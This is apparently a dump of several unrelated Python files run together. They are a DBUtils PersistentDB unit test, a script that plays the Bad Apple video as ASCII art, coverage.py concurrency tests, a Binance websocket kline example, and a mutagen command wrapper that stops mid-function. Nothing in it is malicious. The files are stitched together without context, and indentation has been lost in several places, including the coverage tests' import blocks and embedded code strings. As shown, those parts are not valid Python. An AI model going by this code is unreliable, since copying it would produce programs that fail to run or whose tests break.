We also assume that the underlying SteadyDB connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
__version__ = '1.0'
__revision__ = "$Rev: 7680 $"
__date__ = "$Date$"
import sys
import unittest
sys.path.insert(1, '../..')
# The TestSteadyDB module serves as a mock object for the DB-API 2 module:
from DBUtils import ThreadingLocal
from DBUtils.Testing import TestSteadyDB as dbapi
from DBUtils.PersistentDB import PersistentDB
class TestPersistentDB(unittest.TestCase):
    """Unit tests for PersistentDB against the TestSteadyDB mock DB-API.

    NOTE(review): written for Python 2 (``Queue`` module, ``assert_``,
    ``isAlive``); it runs as-is only under Python 2.
    """

    def setUp(self):
        # Tests mutate the mock module's threadsafety; restore the default.
        dbapi.threadsafety = 1

    def test0_CheckVersion(self):
        """All module version strings must agree with this test's version."""
        from DBUtils import __version__ as DBUtilsVersion
        self.assertEqual(DBUtilsVersion, __version__)
        from DBUtils.PersistentDB import __version__ as PersistentDBVersion
        self.assertEqual(PersistentDBVersion, __version__)
        self.assertEqual(PersistentDB.version, __version__)

    def test1_NoThreadsafety(self):
        """A DB-API module without thread safety must be rejected."""
        from DBUtils.PersistentDB import NotSupportedError
        for dbapi.threadsafety in (None, 0):
            self.assertRaises(NotSupportedError, PersistentDB, dbapi)

    def test2_PersistentDBClose(self):
        """close() really closes only when the pool is 'closeable'."""
        for closeable in (False, True):
            persist = PersistentDB(dbapi, closeable=closeable)
            db = persist.connection()
            self.assert_(db._con.valid)
            db.close()
            self.assert_(closeable ^ db._con.valid)
            db.close()
            self.assert_(closeable ^ db._con.valid)
            # _close() always closes the underlying connection.
            db._close()
            self.assert_(not db._con.valid)
            db._close()
            self.assert_(not db._con.valid)

    def test3_PersistentDBConnection(self):
        """Repeated connection() calls in one thread yield the same object."""
        persist = PersistentDB(dbapi)
        db = persist.connection()
        db_con = db._con
        self.assert_(db_con.database is None)
        self.assert_(db_con.user is None)
        db2 = persist.connection()
        self.assertEqual(db, db2)
        db3 = persist.dedicated_connection()
        self.assertEqual(db, db3)
        db3.close()
        db2.close()
        db.close()

    def test4_PersistentDBThreads(self):
        """Each worker thread keeps its own persistent connection."""
        numThreads = 3
        persist = PersistentDB(dbapi, closeable=True)
        from Queue import Queue, Empty
        # One request queue and one response queue per worker thread.
        queryQueue, resultQueue = [], []
        for i in range(numThreads):
            queryQueue.append(Queue(1))
            resultQueue.append(Queue(1))

        def runQueries(i):
            this_db = persist.connection()
            while 1:
                # The try/except TypeError pairs support both old and new
                # Queue get/put signatures (block, timeout).
                try:
                    try:
                        q = queryQueue[i].get(1, 1)
                    except TypeError:
                        q = queryQueue[i].get(1)
                except Empty:
                    q = None
                if not q:
                    break
                db = persist.connection()
                if db != this_db:
                    r = 'error - not persistent'
                else:
                    if q == 'ping':
                        r = 'ok - thread alive'
                    elif q == 'close':
                        db.close()
                        r = 'ok - connection closed'
                    else:
                        cursor = db.cursor()
                        cursor.execute(q)
                        r = cursor.fetchone()
                        cursor.close()
                # Responses carry the thread index and usage count so the
                # main thread can verify per-thread persistence.
                r = '%d(%d): %s' % (i, db._usage, r)
                try:
                    resultQueue[i].put(r, 1, 1)
                except TypeError:
                    resultQueue[i].put(r, 1)
            db.close()

        from threading import Thread
        threads = []
        for i in range(numThreads):
            thread = Thread(target=runQueries, args=(i,))
            threads.append(thread)
            thread.start()
        # Ping every worker; usage count must still be 0.
        for i in range(numThreads):
            try:
                queryQueue[i].put('ping', 1, 1)
            except TypeError:
                queryQueue[i].put('ping', 1)
        for i in range(numThreads):
            try:
                r = resultQueue[i].get(1, 1)
            except TypeError:
                r = resultQueue[i].get(1)
            self.assertEqual(r, '%d(0): ok - thread alive' % i)
            self.assert_(threads[i].isAlive())
        # Run i+1 queries on thread i; usage increments per query.
        for i in range(numThreads):
            for j in range(i + 1):
                try:
                    queryQueue[i].put('select test%d' % j, 1, 1)
                    r = resultQueue[i].get(1, 1)
                except TypeError:
                    queryQueue[i].put('select test%d' % j, 1)
                    r = resultQueue[i].get(1)
                self.assertEqual(r, '%d(%d): test%d' % (i, j + 1, j))
        try:
            queryQueue[1].put('select test4', 1, 1)
        except TypeError:
            queryQueue[1].put('select test4', 1)
        try:
            r = resultQueue[1].get(1, 1)
        except TypeError:
            r = resultQueue[1].get(1)
        self.assertEqual(r, '1(3): test4')
        # Closing inside the worker must keep the persistent link...
        try:
            queryQueue[1].put('close', 1, 1)
            r = resultQueue[1].get(1, 1)
        except TypeError:
            queryQueue[1].put('close', 1)
            r = resultQueue[1].get(1)
        self.assertEqual(r, '1(3): ok - connection closed')
        # ...and the usage count starts over afterwards.
        for j in range(2):
            try:
                queryQueue[1].put('select test%d' % j, 1, 1)
                r = resultQueue[1].get(1, 1)
            except TypeError:
                queryQueue[1].put('select test%d' % j, 1)
                r = resultQueue[1].get(1)
            self.assertEqual(r, '1(%d): test%d' % (j + 1, j))
        for i in range(numThreads):
            self.assert_(threads[i].isAlive())
            try:
                queryQueue[i].put('ping', 1, 1)
            except TypeError:
                queryQueue[i].put('ping', 1)
        for i in range(numThreads):
            try:
                r = resultQueue[i].get(1, 1)
            except TypeError:
                r = resultQueue[i].get(1)
            self.assertEqual(r, '%d(%d): ok - thread alive' % (i, i + 1))
            self.assert_(threads[i].isAlive())
        # A falsy request tells each worker to exit its loop.
        for i in range(numThreads):
            try:
                queryQueue[i].put(None, 1, 1)
            except TypeError:
                queryQueue[i].put(None, 1)

    def test5_PersistentDBMaxUsage(self):
        """The connection is transparently recycled every maxusage queries."""
        persist = PersistentDB(dbapi, 20)
        db = persist.connection()
        self.assertEqual(db._maxusage, 20)
        for i in range(100):
            cursor = db.cursor()
            cursor.execute('select test%d' % i)
            r = cursor.fetchone()
            cursor.close()
            self.assertEqual(r, 'test%d' % i)
            self.assert_(db._con.valid)
            # Usage counters wrap around at maxusage (20).
            j = i % 20 + 1
            self.assertEqual(db._usage, j)
            self.assertEqual(db._con.num_uses, j)
            self.assertEqual(db._con.num_queries, j)

    def test6_PersistentDBSetSession(self):
        """setsession commands are replayed whenever the connection renews."""
        persist = PersistentDB(dbapi, 3, ('set datestyle',))
        db = persist.connection()
        self.assertEqual(db._maxusage, 3)
        self.assertEqual(db._setsession_sql, ('set datestyle',))
        self.assertEqual(db._con.session, ['datestyle'])
        cursor = db.cursor()
        cursor.execute('set test')
        cursor.fetchone()
        cursor.close()
        for i in range(3):
            self.assertEqual(db._con.session, ['datestyle', 'test'])
            cursor = db.cursor()
            cursor.execute('select test')
            cursor.fetchone()
            cursor.close()
        # After maxusage queries the connection renews: only the
        # configured setsession command survives.
        self.assertEqual(db._con.session, ['datestyle'])

    def test7_PersistentDBThreadLocal(self):
        """A custom threadlocal factory replaces the default one."""
        persist = PersistentDB(dbapi)
        self.assert_(isinstance(persist.thread, ThreadingLocal.local))
        class threadlocal:
            pass
        persist = PersistentDB(dbapi, threadlocal=threadlocal)
        self.assert_(isinstance(persist.thread, threadlocal))
# Run the suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
badapple.py | # file: badapple.py
# description: generate and display txt in cmd.exe
# translated from Touhou - Bad Apple mp4 clip
# author: Hiukong Dan
# version: 1.0 5/May/2021
"""
TODO:
improve resolution of the translated ascii code image
manipulate cmd buffer directly and using another method instead of print
hide cursor if possible (the last line always showing blank due to appearance of cursor)
generating txt: using a compress algorithm to store converted strings
"""
import cv2
import numpy as np
import playsound
import math
import os
import time
import threading
from compressTxt import decompress
def getNextFrameTxt(frame):
    """
    used by function preprocess

    Translate one video frame into a low-resolution text frame sized to
    the current terminal (columns x rows).

    NOTE(review): pixel values are rounded to 0/1 and '#' is emitted for
    value 0 (dark pixels); the original description said '#' meant white
    -- confirm which polarity is intended.
    """
    # Flatten to one row of channel values, then sample every 3rd channel
    # (one value per BGR pixel), rounded to 0 or 1.
    tmp = frame.reshape(1, frame.shape[0] * frame.shape[1] * len(frame[0][0]))
    tmp = [round(tmp[0][x]/255) for x in range(0, len(tmp[0]), 3)]

    # transform badapple pixels to single values
    raw_pixels = np.array(tmp).reshape(frame.shape[0], frame.shape[1])

    # Show the source frame while converting (debug aid).
    cv2.imshow('frame', frame)

    # Down-sample to terminal size by striding over rows and columns.
    win_size = os.get_terminal_size()
    ret = []
    for row_count in range(0, len(raw_pixels), int(raw_pixels.shape[0]/win_size[1])):
        row = raw_pixels[row_count]
        ret.append(["#" if row[x] == 0 else " " for x in range(0, raw_pixels.shape[1], int(raw_pixels.shape[1]/win_size[0]))])
    # print("converted shape: %d, %d" % (len(ret), len(ret[0])))

    # Join rows into one newline-separated string.
    res = ""
    for row in ret:
        res += ''.join(row)
        res += "\n"
    return res
def preprocess():
    """
    used to generate the bad apple txt from the original mp4 data

    NOTE(review): the loop has no break when cap.read() stops returning
    frames, so this may spin at end-of-file -- confirm cv2 isOpened()
    behaviour for this clip.
    """
    with open("badapple.txt", 'w') as fil:
        cap = cv2.VideoCapture("Touhou - Bad Apple.mp4")
        while(cap.isOpened()):
            ret, frame = cap.read()
            if(ret == True):
                fil.write(getNextFrameTxt(frame))
        cap.release()
        cv2.destroyAllWindows()
def processBadAppleTxt():
    """
    process string data generated by function preprocess
    and display frame by frame using a lag calculated method
    (sleep only for the time remaining until the next frame is due).
    """
    win_size = os.get_terminal_size()
    frame_rate = 30
    current_frame = 0
    start_time = time.time()
    with open("compressed_badapple.txt", 'r') as fil:
        while True:
            try:
                # One frame = (rows - 1) compressed lines followed by a
                # separator line that is discarded.
                display = ""
                for x in range(win_size[1]-1):
                    display += decompress(fil.readline())
                fil.readline()
                print(display)
                # Compute when the next frame is due and sleep only for
                # the remaining time, compensating for render lag.
                next_frame_time = (current_frame + 1) * 1 / frame_rate + start_time
                current_frame += 1
                lag = next_frame_time - time.time()
                if lag > 0:
                    time.sleep(lag)
            except AssertionError as error:
                # decompress() asserts on malformed/exhausted input;
                # treat that as end-of-stream.
                print(error)
                break
def playBadAppleSound():
    """
    play audio using playsound (blocking until playback finishes)
    """
    audio_file = "Touhou - Bad Apple.mp3"
    playsound.playsound(audio_file)
if __name__ == "__main__":
    # Render thread and audio thread run concurrently; A/V sync is
    # best-effort (no explicit synchronization between the two threads).
    display_task = threading.Thread(target=processBadAppleTxt)
    playsound_task = threading.Thread(target=playBadAppleSound)
    display_task.start()
    playsound_task.start()

# Dead test code kept for reference (module-level string, never executed).
"""
# opencv test code
cap = cv2.VideoCapture("Touhou - Bad Apple.mp4")
while(cap.isOpened()):
ret, frame = cap.read()
if(ret == True):
printNextFrame(frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
"""
|
test_concurrency.py | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for concurrency libraries."""
import glob
import os
import random
import re
import sys
import threading
import time
from flaky import flaky
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.files import abs_file
from coverage.misc import import_local_file
from tests.coveragetest import CoverageTest
from tests.helpers import remove_files
# These libraries aren't always available, we'll skip tests if they aren't.
try:
import multiprocessing
except ImportError: # pragma: only jython
multiprocessing = None
try:
import eventlet
except ImportError:
eventlet = None
try:
import gevent
except ImportError:
gevent = None
try:
import greenlet
except ImportError: # pragma: only jython
greenlet = None
def measurable_line(l):
    """Is this a line of code coverage will measure?

    Not blank, not a comment, and not "else"
    """
    stripped = l.strip()
    if not stripped:
        return False
    if stripped.startswith('#') or stripped.startswith('else:'):
        return False
    if env.JYTHON and stripped.startswith(('try:', 'except:', 'except ', 'break', 'with ')):
        # Jython doesn't measure these statements.
        return False  # pragma: only jython
    return True
def line_count(s):
    """How many measurable lines are in `s`?"""
    return sum(1 for line in s.splitlines() if measurable_line(line))
def print_simple_annotation(code, linenos):
    """Print the lines in `code` with X for each line number in `linenos`."""
    for lineno, line in enumerate(code.splitlines(), start=1):
        marker = "X" if lineno in linenos else " "
        print(" {} {}".format(marker, line))
class LineCountTest(CoverageTest):
    """Test the helpers here."""

    run_in_temp_dir = False

    def test_line_count(self):
        # Five measurable lines: the assignment, the `if`, and the three
        # prints (blank, comment, and `else:` lines are excluded).
        CODE = """
# Hey there!
x = 1
if x:
print("hello")
else:
print("bye")
print("done")
"""
        assert line_count(CODE) == 5
# The code common to all the concurrency models.
SUM_RANGE_Q = """
# Above this will be imports defining queue and threading.
class Producer(threading.Thread):
def __init__(self, limit, q):
threading.Thread.__init__(self)
self.limit = limit
self.q = q
def run(self):
for i in range(self.limit):
self.q.put(i)
self.q.put(None)
class Consumer(threading.Thread):
def __init__(self, q, qresult):
threading.Thread.__init__(self)
self.q = q
self.qresult = qresult
def run(self):
sum = 0
while "no peephole".upper():
i = self.q.get()
if i is None:
break
sum += i
self.qresult.put(sum)
def sum_range(limit):
q = queue.Queue()
qresult = queue.Queue()
c = Consumer(q, qresult)
p = Producer(limit, q)
c.start()
p.start()
p.join()
c.join()
return qresult.get()
# Below this will be something using sum_range.
"""
PRINT_SUM_RANGE = """
print(sum_range({QLIMIT}))
"""
# Import the things to use threads.
THREAD = """
import threading
import queue
"""
# Import the things to use eventlet.
EVENTLET = """
import eventlet.green.threading as threading
import eventlet.queue as queue
"""
# Import the things to use gevent.
GEVENT = """
from gevent import monkey
monkey.patch_thread()
import threading
import gevent.queue as queue
"""
# Uncomplicated code that doesn't use any of the concurrency stuff, to test
# the simple case under each of the regimes.
SIMPLE = """
total = 0
for i in range({QLIMIT}):
total += i
print(total)
"""
def cant_trace_msg(concurrency, the_module):
    """What might coverage.py say about a concurrency setting and imported module?"""
    # In the concurrency choices, "multiprocessing" doesn't count, so remove it.
    if "multiprocessing" in concurrency:
        parts = concurrency.split(",")
        parts.remove("multiprocessing")
        concurrency = ",".join(parts)

    if the_module is None:
        # We don't even have the underlying module installed; we expect
        # coverage to alert us to this fact.
        return (
            "Couldn't trace with concurrency=%s, "
            "the module isn't installed.\n" % concurrency
        )
    if env.C_TRACER or concurrency in ("thread", ""):
        # Fully supported: no complaint expected.
        return None
    return (
        "Can't support concurrency=%s with PyTracer, "
        "only threads are supported\n" % concurrency
    )
class ConcurrencyTest(CoverageTest):
    """Tests of the concurrency support in coverage.py."""

    QLIMIT = 1000   # size of sum_range(); large enough to exercise the workers.

    def try_some_code(self, code, concurrency, the_module, expected_out=None):
        """Run some concurrency testing code and see that it was all covered.

        `code` is the Python code to execute.  `concurrency` is the name of
        the concurrency regime to test it under.  `the_module` is the imported
        module that must be available for this to work at all.  `expected_out`
        is the text we expect the code to produce.
        """
        self.make_file("try_it.py", code)
        cmd = "coverage run --concurrency=%s try_it.py" % concurrency
        out = self.run_command(cmd)
        expected_cant_trace = cant_trace_msg(concurrency, the_module)
        if expected_cant_trace is not None:
            assert out == expected_cant_trace
        else:
            # We can fully measure the code if we are using the C tracer, which
            # can support all the concurrency, or if we are using threads.
            if expected_out is None:
                expected_out = "%d\n" % (sum(range(self.QLIMIT)))
            print(code)
            assert out == expected_out
            # Read the coverage file and see that try_it.py has all its lines
            # executed.
            data = coverage.CoverageData(".coverage")
            data.read()
            # If the test fails, it's helpful to see this info:
            fname = abs_file("try_it.py")
            linenos = data.lines(fname)
            print(f"{len(linenos)}: {linenos}")
            print_simple_annotation(code, linenos)
            lines = line_count(code)
            assert line_counts(data)['try_it.py'] == lines

    def test_threads(self):
        code = (THREAD + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "thread", threading)

    def test_threads_simple_code(self):
        code = SIMPLE.format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "thread", threading)

    def test_eventlet(self):
        code = (EVENTLET + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "eventlet", eventlet)

    def test_eventlet_simple_code(self):
        code = SIMPLE.format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "eventlet", eventlet)

    def test_gevent(self):
        code = (GEVENT + SUM_RANGE_Q + PRINT_SUM_RANGE).format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "gevent", gevent)

    def test_gevent_simple_code(self):
        code = SIMPLE.format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "gevent", gevent)

    def test_greenlet(self):
        # NOTE: line_count(code) is asserted downstream, so no blank lines
        # are added to this snippet.
        GREENLET = """\
from greenlet import greenlet
def test1(x, y):
    z = gr2.switch(x+y)
    print(z)
def test2(u):
    print(u)
    gr1.switch(42)
gr1 = greenlet(test1)
gr2 = greenlet(test2)
gr1.switch("hello", " world")
"""
        self.try_some_code(GREENLET, "greenlet", greenlet, "hello world\n42\n")

    def test_greenlet_simple_code(self):
        code = SIMPLE.format(QLIMIT=self.QLIMIT)
        self.try_some_code(code, "greenlet", greenlet)

    def test_bug_330(self):
        BUG_330 = """\
from weakref import WeakKeyDictionary
import eventlet
def do():
    eventlet.sleep(.01)
gts = WeakKeyDictionary()
for _ in range(100):
    gts[eventlet.spawn(do)] = True
    eventlet.sleep(.005)
eventlet.sleep(.1)
print(len(gts))
"""
        self.try_some_code(BUG_330, "eventlet", eventlet, "0\n")
# Worker body whose executed lines differ depending on the input's parity.
SQUARE_OR_CUBE_WORK = """
def work(x):
    # Use different lines in different subprocesses.
    if x % 2:
        y = x*x
    else:
        y = x*x*x
    return y
"""
# Worker body that exercises the threaded sum_range() helper.
SUM_RANGE_WORK = """
def work(x):
    return sum_range((x+1)*100)
"""
# Driver that fans work() out over a multiprocessing pool; formatted with
# NPROCS (pool size) and UPTO (number of inputs).
MULTI_CODE = """
# Above this will be a definition of work().
import multiprocessing
import os
import time
import sys
def process_worker_main(args):
    # Need to pause, or the tasks go too quickly, and some processes
    # in the pool don't get any work, and then don't record data.
    time.sleep(0.02)
    ret = work(*args)
    return os.getpid(), ret
if __name__ == "__main__":      # pragma: no branch
    # This if is on a single line so we can get 100% coverage
    # even if we have no arguments.
    if len(sys.argv) > 1: multiprocessing.set_start_method(sys.argv[1])
    pool = multiprocessing.Pool({NPROCS})
    inputs = [(x,) for x in range({UPTO})]
    outputs = pool.imap_unordered(process_worker_main, inputs)
    pids = set()
    total = 0
    for pid, sq in outputs:
        pids.add(pid)
        total += sq
    print("%d pids, total = %d" % (len(pids), total))
    pool.close()
    pool.join()
"""
@pytest.mark.skipif(not multiprocessing, reason="No multiprocessing in this Python")
@flaky(max_runs=30)     # Sometimes a test fails due to inherent randomness. Try more times.
class MultiprocessingTest(CoverageTest):
    """Test support of the multiprocessing module."""

    def try_multiprocessing_code(
        self, code, expected_out, the_module, nprocs, concurrency="multiprocessing", args=""
    ):
        """Run code using multiprocessing, it should produce `expected_out`."""
        self.make_file("multi.py", code)
        self.make_file(".coveragerc", """\
[run]
concurrency = %s
source = .
""" % concurrency)
        for start_method in ["fork", "spawn"]:
            if start_method and start_method not in multiprocessing.get_all_start_methods():
                continue
            remove_files(".coverage", ".coverage.*")
            cmd = "coverage run {args} multi.py {start_method}".format(
                args=args, start_method=start_method,
            )
            out = self.run_command(cmd)
            expected_cant_trace = cant_trace_msg(concurrency, the_module)
            if expected_cant_trace is not None:
                assert out == expected_cant_trace
            else:
                assert out.rstrip() == expected_out
                # One data file per worker process, plus one for the main one.
                assert len(glob.glob(".coverage.*")) == nprocs + 1
                out = self.run_command("coverage combine")
                assert out == ""
                out = self.run_command("coverage report -m")
                last_line = self.squeezed_lines(out)[-1]
                assert re.search(r"TOTAL \d+ 0 100%", last_line)

    def test_multiprocessing_simple(self):
        nprocs = 3
        upto = 30
        code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
        total = sum(x*x if x%2 else x*x*x for x in range(upto))
        expected_out = f"{nprocs} pids, total = {total}"
        self.try_multiprocessing_code(code, expected_out, threading, nprocs)

    def test_multiprocessing_append(self):
        nprocs = 3
        upto = 30
        code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
        total = sum(x*x if x%2 else x*x*x for x in range(upto))
        expected_out = f"{nprocs} pids, total = {total}"
        self.try_multiprocessing_code(code, expected_out, threading, nprocs, args="--append")

    def test_multiprocessing_and_gevent(self):
        nprocs = 3
        upto = 30
        code = (
            SUM_RANGE_WORK + EVENTLET + SUM_RANGE_Q + MULTI_CODE
        ).format(NPROCS=nprocs, UPTO=upto)
        total = sum(sum(range((x + 1) * 100)) for x in range(upto))
        expected_out = f"{nprocs} pids, total = {total}"
        self.try_multiprocessing_code(
            code, expected_out, eventlet, nprocs, concurrency="multiprocessing,eventlet"
        )

    def try_multiprocessing_code_with_branching(self, code, expected_out):
        """Run code using multiprocessing, it should produce `expected_out`."""
        self.make_file("multi.py", code)
        self.make_file("multi.rc", """\
[run]
concurrency = multiprocessing
branch = True
omit = */site-packages/*
""")
        for start_method in ["fork", "spawn"]:
            if start_method and start_method not in multiprocessing.get_all_start_methods():
                continue
            out = self.run_command(f"coverage run --rcfile=multi.rc multi.py {start_method}")
            assert out.rstrip() == expected_out
            out = self.run_command("coverage combine")
            assert out == ""
            out = self.run_command("coverage report -m")
            last_line = self.squeezed_lines(out)[-1]
            assert re.search(r"TOTAL \d+ 0 \d+ 0 100%", last_line)

    def test_multiprocessing_with_branching(self):
        nprocs = 3
        upto = 30
        code = (SQUARE_OR_CUBE_WORK + MULTI_CODE).format(NPROCS=nprocs, UPTO=upto)
        total = sum(x*x if x%2 else x*x*x for x in range(upto))
        expected_out = f"{nprocs} pids, total = {total}"
        self.try_multiprocessing_code_with_branching(code, expected_out)

    def test_multiprocessing_bootstrap_error_handling(self):
        # An exception during bootstrapping will be reported.
        self.make_file("multi.py", """\
import multiprocessing
if __name__ == "__main__":
    with multiprocessing.Manager():
        pass
""")
        self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
_crash = _bootstrap
""")
        out = self.run_command("coverage run multi.py")
        assert "Exception during multiprocessing bootstrap init" in out
        assert "Exception: Crashing because called by _bootstrap" in out

    def test_bug890(self):
        # chdir in multiprocessing shouldn't keep us from finding the
        # .coveragerc file.
        self.make_file("multi.py", """\
import multiprocessing, os, os.path
if __name__ == "__main__":
    if not os.path.exists("./tmp"): os.mkdir("./tmp")
    os.chdir("./tmp")
    with multiprocessing.Manager():
        pass
    print("ok")
""")
        self.make_file(".coveragerc", """\
[run]
concurrency = multiprocessing
""")
        out = self.run_command("coverage run multi.py")
        assert out.splitlines()[-1] == "ok"
def test_coverage_stop_in_threads():
    """Coverage.stop() in the main thread must also stop tracing worker threads."""
    has_started_coverage = []
    has_stopped_coverage = []

    def run_thread():                           # pragma: nested
        """Check that coverage is stopping properly in threads."""
        deadline = time.time() + 5
        ident = threading.current_thread().ident
        if sys.gettrace() is not None:
            has_started_coverage.append(ident)
        while sys.gettrace() is not None:
            # Wait for coverage to stop
            time.sleep(0.01)
            if time.time() > deadline:
                # Give up after 5 seconds so a failure doesn't hang the suite.
                return
        has_stopped_coverage.append(ident)

    cov = coverage.Coverage()
    cov.start()
    t = threading.Thread(target=run_thread)     # pragma: nested
    t.start()                                   # pragma: nested
    time.sleep(0.1)                             # pragma: nested
    cov.stop()                                  # pragma: nested
    t.join()

    assert has_started_coverage == [t.ident]
    assert has_stopped_coverage == [t.ident]
def test_thread_safe_save_data(tmpdir):
    # Non-regression test for: https://github.com/nedbat/coveragepy/issues/581
    # Create some Python modules and put them in the path
    modules_dir = tmpdir.mkdir('test_modules')
    module_names = [f"m{i:03d}" for i in range(1000)]
    for module_name in module_names:
        modules_dir.join(module_name + ".py").write("def f(): pass\n")

    # Shared variables for threads
    should_run = [True]
    imported = []

    old_dir = os.getcwd()
    os.chdir(modules_dir.strpath)
    try:
        # Make sure that all dummy modules can be imported.
        for module_name in module_names:
            import_local_file(module_name)

        def random_load():                      # pragma: nested
            """Import modules randomly to stress coverage."""
            while should_run[0]:
                module_name = random.choice(module_names)
                mod = import_local_file(module_name)
                mod.f()
                imported.append(mod)

        # Spawn some threads with coverage enabled and attempt to read the
        # results right after stopping coverage collection with the threads
        # still running.
        duration = 0.01
        for _ in range(3):
            cov = coverage.Coverage()
            cov.start()
            threads = [threading.Thread(target=random_load) for _ in range(10)]     # pragma: nested
            should_run[0] = True                # pragma: nested
            for t in threads:                   # pragma: nested
                t.start()
            time.sleep(duration)                # pragma: nested
            cov.stop()                          # pragma: nested
            # The following call used to crash with running background threads.
            cov.get_data()
            # Stop the threads
            should_run[0] = False
            for t in threads:
                t.join()
            # If nothing was imported, double the window and try again.
            if (not imported) and duration < 10:    # pragma: only failure
                duration *= 2
    finally:
        os.chdir(old_dir)
        should_run[0] = False
|
example_kline_1m.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_kline_1m.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import print_function
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
# https://docs.python.org/3/library/logging.html
logging.basicConfig(filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
logging.getLogger('unicorn-log').setLevel(logging.INFO)
logging.getLogger('unicorn-log').addHandler(logging.StreamHandler())
# create instance of BinanceWebSocketApiManager
binance_websocket_api_manager = BinanceWebSocketApiManager()
binance_get_kline_1m_bnbbtc = binance_websocket_api_manager.create_stream('kline_1m', 'bnbbtc')
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Drain the manager's stream_buffer and print closed 1m klines.

    Runs forever in a worker thread; raises SystemExit when the manager is
    shutting down.
    """
    # Hoisted out of the loop: the original re-imported UnicornFy on every
    # received record, which is wasteful.
    from unicorn_fy import UnicornFy
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            exit(0)
        oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            # Buffer is empty; back off briefly instead of busy-spinning.
            time.sleep(0.01)
        else:
            oldest_stream_data_from_stream_buffer = UnicornFy.binance_websocket(oldest_stream_data_from_stream_buffer)
            # Print only klines that have closed (event time past close time).
            # NOTE(review): assumes every unified record carries 'event_time'
            # and a 'kline' dict — confirm against UnicornFy's output schema.
            if oldest_stream_data_from_stream_buffer['event_time'] >= oldest_stream_data_from_stream_buffer['kline']['kline_close_time']:
                print(oldest_stream_data_from_stream_buffer)
# start one worker process (or more) to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
|
wrapper.py | import logging
import os
import re
import shlex
import subprocess
import sys
import time
from queue import Queue, Empty
from threading import Thread
from click import ClickException
mutagen = os.environ.get('MUTAGEN_HELPER_MUTAGEN_BIN', "mutagen.exe" if os.name == 'nt' else "mutagen")
class WrapperException(ClickException):
    """Base exception for all wrapper errors."""


class WrapperRunException(WrapperException):
    """A wrapped command failed; carries the CompletedProcess as `result`."""

    def __init__(self, *args, **kwargs):
        # `result` (keyword-only, required) is the CompletedProcess of the
        # failed invocation.
        self.result = kwargs.pop('result')
        super().__init__(*args, **kwargs)

    def format_message(self):
        """Append the failed command's stdout/stderr to the base message."""
        message = super().format_message()
        if self.result:
            if self.result.stdout:
                message = message + os.linesep + self.result.stdout
            if self.result.stderr:
                message = message + os.linesep + self.result.stderr
        return message


class MutagenRunException(WrapperRunException):
    """A mutagen invocation returned a non-zero exit code."""


class DaemonNotRunningException(WrapperRunException):
    """The mutagen daemon is not running."""


class MultipleSessionsException(WrapperRunException):
    """More than one session matched when exactly one was expected."""
class MutagenListParser:
    """Parse the indented key/value output of ``mutagen sync list``."""

    def _is_separator_line(self, line):
        # Session records are delimited by long runs of dashes.
        return line.startswith('-' * 10)

    def _is_no_session_line(self, line):
        return line in ['No sessions found', 'No synchronization sessions found']

    def parse(self, output, result=None):
        """Parse `output` into a list of session dicts.

        Nesting depth is encoded with leading tab characters: a deeper
        ``key: value`` line opens a nested dict under the previous key, and a
        deeper bare value opens a nested list.  `result` is only used to
        enrich the exception raised for malformed output.
        """
        if not output:
            return []
        lines = output.splitlines()
        first_separator_reached = False
        stack = [{}]
        sessions = []
        current_object = {}
        previous_key = None
        for line in lines:
            if not first_separator_reached:
                # Skip any banner text before the first separator.
                if self._is_separator_line(line):
                    first_separator_reached = True
                continue
            if self._is_separator_line(line):
                # A separator closes the current session record.
